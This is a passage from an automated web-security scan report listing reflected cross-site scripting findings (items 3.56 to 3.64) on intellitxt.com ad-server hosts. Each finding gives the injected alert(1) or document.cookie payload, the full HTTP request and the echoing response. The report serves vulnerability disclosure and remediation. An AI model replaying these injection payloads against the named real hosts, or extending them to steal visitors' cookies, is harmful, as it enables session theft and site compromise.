GET /al.asp?ts=20110218152309&adid=0%2C0%2C0%2C0%2C0%2C0&cc=us&di=29608421%2C29608413%2C29608378%2C30073701%2C30019010%2C30073704&hk=1&ipid=26010&mh=0f813f309d5cacd41f37cc296f7d04b3&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=c94d0e979f8311611a6d3feb87776715&pvu=B5833CD53518442CBC5E30D5B26FA9D2&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=377%2C363%3B674%2C813%3B475%2C1101%3B555%2C1208%3B517%2C1423%3B332%2C2148%3B&prf=ll%3A165%7Cintl%3A1453%7Cpreprochrome%3A1%7Cgetconchrome%3A81%7Ccontint%3A9875%7Ccontl%3A11414%7Cadvint%3A1390%7Cadvl%3A12804%7Ctl%3A12904&jscallback=$iTXT.js.callback95b734%3balert(1)//79a8a9bd1be HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:22:46 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Fri, 18 Feb 2011 15:22:46 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback95b734;alert(1)//79a8a9bd1be();}catch(e){}

3.56. http://pdastreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32ea6'-alert(1)-'e74a34b7216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26010&32ea6'-alert(1)-'e74a34b7216=1 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVygRAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:21:35 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVygRQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:21:35 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:21:35 GMT
Age: 0
Connection: keep-alive
Content-Length: 10599

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
c="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218152135";})();$iTXT.js.serverUrl='http://pdastreet.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26010&32ea6'-alert(1)-'e74a34b7216=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.57. http://pdastreet.us.intellitxt.com/v4/advert [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6ef9b%3balert(1)//5afbc9e6ad4 was submitted in the jscallback parameter. This input was echoed as 6ef9b;alert(1)//5afbc9e6ad4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1298042588177&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&sid=0f813f309d5cacd41f37cc296f7d04b3&pvu=B5833CD53518442CBC5E30D5B26FA9D2&pvm=c94d0e979f8311611a6d3feb87776715&ipid=26010&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback86ef9b%3balert(1)//5afbc9e6ad4 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:22:44 GMT
Age: 0
Connection: keep-alive
Content-Length: 12665

(function(){var nh = new $iTXT.ui.Hook({value: "mobile",uid: "2A836D895EC14C72AC24C9D232D5A08E",uidh: "9327353bf3d66ede3e875d4ec30da6e6",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl.
...[SNIP]...
return ad;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('Generic');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback86ef9b;alert(1)//5afbc9e6ad4();}catch(e){}

3.58. http://pdastreet.us.intellitxt.com/v4/context [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb568%3balert(1)//5852d7bbed6 was submitted in the jscallback parameter. This input was echoed as eb568;alert(1)//5852d7bbed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042578302&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&sid=0f813f309d5cacd41f37cc296f7d04b3&pvu=B5833CD53518442CBC5E30D5B26FA9D2&pvm=c94d0e979f8311611a6d3feb87776715&ipid=26010&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=41002&jsoncl=6073&ppc=-1&hn=38&chunkkey=26010:0f813f309d5cacd41f37cc296f7d04b3:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A6%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A7%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A8%2Cc%3A%22Listen%20as%20Kevin%20Remde%20and%20his%20guests%20discuss%20the%20productivity%20tools%20that%20business%20users%20expect...%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A9%2Cc%3A%22Internet.com's%20premiere%20site%20for%20mobile%20managers%20and%20IT%20professionals%20is%20where%20wireless%20meets%20business.%20Our%20expert%20analysis%20and%20tips%20will%20guide%20you%20in%20buying%2C%20deploying%2C%20securing%20an&chunk=0&total=7&jscallback=$i
TXT.js.callback1eb568%3balert(1)//5852d7bbed6 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:22:49 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1eb568;alert(1)//5852d7bbed6();}catch(e){}

3.59. http://pdastreet.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7c853%3balert(1)//91f488e00aa was submitted in the jscallback parameter. This input was echoed as 7c853;alert(1)//91f488e00aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042576928&pagecl=41002&fv=10&muid=&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&ipid=26010&jscallback=$iTXT.js.callback07c853%3balert(1)//91f488e00aa HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:23:16 GMT
Age: 0
Connection: keep-alive
Content-Length: 19497

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback07c853;alert(1)//91f488e00aa({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.60. http://pdastreet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba6a5"-alert(1)-"6765de298f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042576928&pagecl=41002&fv=10&muid=&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&ipid=26010&jscallback=$iTXT.js.callback0&ba6a5"-alert(1)-"6765de298f2=1 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:23:20 GMT
Age: 0
Connection: keep-alive
Content-Length: 19478

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","ba6a5"-alert(1)-"6765de298f2":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4\u003d1","rcc":"us","cc":"us"},null,60);var un
...[SNIP]...

3.61. http://smartphonetoday.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ac5ee%3balert(1)//e397277eba was submitted in the jscallback parameter. This input was echoed as ac5ee;alert(1)//e397277eba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110218152112&adid=0%2C0%2C0%2C0%2C0%2C0&cc=us&di=29608421%2C29608413%2C29608378%2C30073701%2C30019010%2C30073704&hk=1&ipid=26011&mh=5bbec50d8fe172507531204b6f39cc85&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=4cedcfaeb263b70d71df9c7c8e01740b&pvu=F8F9754A003A48FEB9B6ABE9370A1463&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=377%2C358%3B674%2C799%3B475%2C1087%3B555%2C1181%3B517%2C1383%3B332%2C2095%3B&prf=ll%3A1582%7Cintl%3A2807%7Cpreprochrome%3A3%7Cgetconchrome%3A104%7Ccontint%3A9658%7Ccontl%3A12573%7Cadvint%3A1492%7Cadvl%3A14065%7Ctl%3A14167&jscallback=$iTXT.js.callback9ac5ee%3balert(1)//e397277eba HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:20:55 GMT; Path=/
Content-Type: text/javascript
Content-Length: 64
Date: Fri, 18 Feb 2011 15:20:55 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback9ac5ee;alert(1)//e397277eba();}catch(e){}

3.62. http://smartphonetoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9ed5'-alert(1)-'06b4bf80a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26011&a9ed5'-alert(1)-'06b4bf80a8c=1 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVqvOwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:19:27 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVqvOwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:19:27 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:19:27 GMT
Age: 0
Connection: keep-alive
Content-Length: 10605

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
p://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218151927";})();$iTXT.js.serverUrl='http://smartphonetoday.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26011&a9ed5'-alert(1)-'06b4bf80a8c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.63. http://smartphonetoday.us.intellitxt.com/v4/advert [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b7268%3balert(1)//eac604c61a3 was submitted in the jscallback parameter. This input was echoed as b7268;alert(1)//eac604c61a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1298042470709&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&sid=5bbec50d8fe172507531204b6f39cc85&pvu=F8F9754A003A48FEB9B6ABE9370A1463&pvm=4cedcfaeb263b70d71df9c7c8e01740b&ipid=26011&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback8b7268%3balert(1)//eac604c61a3 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:20:53 GMT
Age: 0
Connection: keep-alive
Content-Length: 12665

(function(){var nh = new $iTXT.ui.Hook({value: "mobile",uid: "09EBBEA915474367B32F83557F9A7F49",uidh: "9daf5377f0fb212ec92c7b0ce9b588ed",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl.
...[SNIP]...
return ad;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('Generic');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback8b7268;alert(1)//eac604c61a3();}catch(e){}

3.64. http://smartphonetoday.us.intellitxt.com/v4/context [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39e99%3balert(1)//26306191dc7 was submitted in the jscallback parameter. This input was echoed as 39e99;alert(1)//26306191dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042461051&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&sid=5bbec50d8fe172507531204b6f39cc85&pvu=F8F9754A003A48FEB9B6ABE9370A1463&pvm=4cedcfaeb263b70d71df9c7c8e01740b&ipid=26011&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=61592&jsoncl=5886&ppc=-1&hn=37&chunkkey=26011:5bbec50d8fe172507531204b6f39cc85:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%2